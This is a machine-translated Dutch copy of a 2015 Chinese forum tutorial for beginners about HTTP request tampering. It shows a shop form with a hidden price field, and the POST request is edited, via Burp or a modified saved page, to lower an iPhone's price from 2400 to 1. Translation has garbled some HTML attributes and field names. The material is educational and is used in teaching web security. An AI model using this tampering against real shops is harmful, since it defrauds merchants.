Dit artikel is een spiegelartikel van machinevertaling, klik hier om naar het oorspronkelijke artikel te gaan.

Architect_Programmer_Code Landbouwnetwerk»Architect Andere technologieën Veilige aanval en verdediging Intrusiepenetratie: Toepassing van HTTP-headers
Bekijken: 12586|Antwoord: 0

[Veiligheidstutorial] Intrusiepenetratie: Toepassing van HTTP-headers

[Link kopiëren]
Geplaatst op 07-02-2015 17:59:07 | | |

Over de toepassing van HTTP-headers

De http-header wordt vaak gebruikt in het transmissiemechanisme van websites, maar de meeste beginners in China hebben dit stuk niet opgemerkt; dit artikel is alleen gewijd aan beginners, de rol van de http-header in het inbraakproces.

Neem de winkelpagina als voorbeeld om een klein deel van de rol van HTTP-headers te analyseren.

Laten we eerst een formulier op de winkelpagina analyseren.

<form method="post" actie="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br />  <!--注意此行代码-->

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<invoertype="verborgen" naam="prijs" waarde="449">

<invoertype="indienen" waarde="Kopen">

</form>

Maak tijdens het openingsproces een screenshot van zijn http-berichtheader en kijk ernaar

POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

hoeveelheid=1&price=2400

Hoewel het prijsveld niet op de pagina wordt weergegeven bij het openen van de winkelpagina, kan het nog steeds door de gebruiker worden bewerkt en bediend.

Er zijn twee manieren om te bewerken

1. Sla de HTML-broncode op voor aanpassing en laad deze vervolgens opnieuw in de browser om te draaien

2. Gebruik proxy-interceptie om HTTP-headers te wijzigen (proxy-constructie in tool burp)

Neem de HTTP-header hierboven als voorbeeld
Voor de verandering
POST /shop/2/shop.php?id=1 HTTP/1.1                  
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

hoeveelheid=1&price=2400

Na de verandering
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

hoeveelheid=1&price=1


In de laatste regel heeft het veld een waarde van 2400 en als we die veranderen naar 1 kunnen we de iPhone 4S goedkoper krijgen.

Dit artikel geeft slechts een idee van onverwachte voordelen zoals LDAP-injectie.




Vorig:MySQL Forgot Password Recovery Wachtwoordimplementatiemethode
Volgend:SQL-injectie om het volledige websitepad te verkrijgen

Gerelateerde berichten
Disclaimer:
Alle software, programmeermaterialen of artikelen die door Code Farmer Network worden gepubliceerd, zijn uitsluitend bedoeld voor leer- en onderzoeksdoeleinden; De bovenstaande inhoud mag niet worden gebruikt voor commerciële of illegale doeleinden, anders dragen gebruikers alle gevolgen. De informatie op deze site komt van het internet, en auteursrechtconflicten hebben niets met deze site te maken. Je moet bovenstaande inhoud volledig van je computer verwijderen binnen 24 uur na het downloaden. Als je het programma leuk vindt, steun dan de echte software, koop registratie en krijg betere echte diensten. Als er sprake is van een inbreuk, neem dan contact met ons op via e-mail.
Mail To:help@itsvse.com